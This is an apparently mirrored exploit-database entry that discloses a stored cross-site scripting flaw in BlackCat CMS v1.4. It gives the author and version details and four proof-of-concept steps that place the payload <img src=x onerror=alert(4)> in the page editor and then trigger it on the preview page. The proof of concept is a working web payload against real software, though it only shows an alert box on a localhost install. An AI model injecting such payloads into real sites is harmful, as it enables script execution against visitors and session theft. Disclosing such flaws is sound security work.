Share
## https://sploitus.com/exploit?id=PACKETSTORM:173611
Exploit Title: Blackcat Cms v1.4 - Stored XSS  
Application: blackcat Cms  
Version: v1.4  
Bugs: Stored XSS  
Technology: PHP  
Vendor URL: https://blackcat-cms.org/  
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS  
Date of found: 13.07.2023  
Author: Mirabbas Ağalarov  
Tested on: Linux   
  
  
2. Technical Details & POC  
========================================  
steps:   
  
1. login to account  
2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)  
3. set as <img src=x onerror=alert(4)>  
4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1